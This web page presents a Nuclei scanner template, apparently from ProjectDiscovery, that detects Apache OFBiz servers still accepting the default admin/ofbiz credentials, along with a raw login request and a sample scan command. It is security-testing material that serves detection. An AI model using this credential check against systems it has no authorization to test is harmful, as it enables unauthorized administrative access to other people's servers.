Apache OfBiz Default Login

ID: ofbiz-default-login

Severity: high

Author: pdteam

Tags: ofbiz,default-login,apache

Description

Apache OfBiz default admin credentials were discovered.

YAML Source

id: ofbiz-default-login

info:
  name: Apache OfBiz Default Login
  author: pdteam
  severity: high
  description: Apache OfBiz default admin credentials were discovered.
  reference:
    - https://cwiki.apache.org/confluence/display/OFBIZ/Apache+OFBiz+Technical+Production+Setup+Guide
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cwe-id: CWE-522
  metadata:
    max-request: 1
  tags: ofbiz,default-login,apache

http:
  - raw:
      - |
        POST /control/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        USERNAME={{username}}&PASSWORD={{password}}&FTOKEN=&JavaScriptEnabled=Y

    payloads:
      username:
        - admin
      password:
        - ofbiz
    attack: pitchfork
    matchers:
      - type: word
        words:
          - "ofbiz-pagination-template"
          - "<span>Powered by OFBiz</span>"
        condition: and
# digest: 490a0046304402207c06de957f86c4a4ee63b3b6205c071e941e17b45a62f64208d0e2f6ed740e4c02203a579b2d8d3be1a0bcfc9720c82510b8d93a287c83166febf5fdca9537839597:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/default-logins/ofbiz/ofbiz-default-login.yaml"

View on Github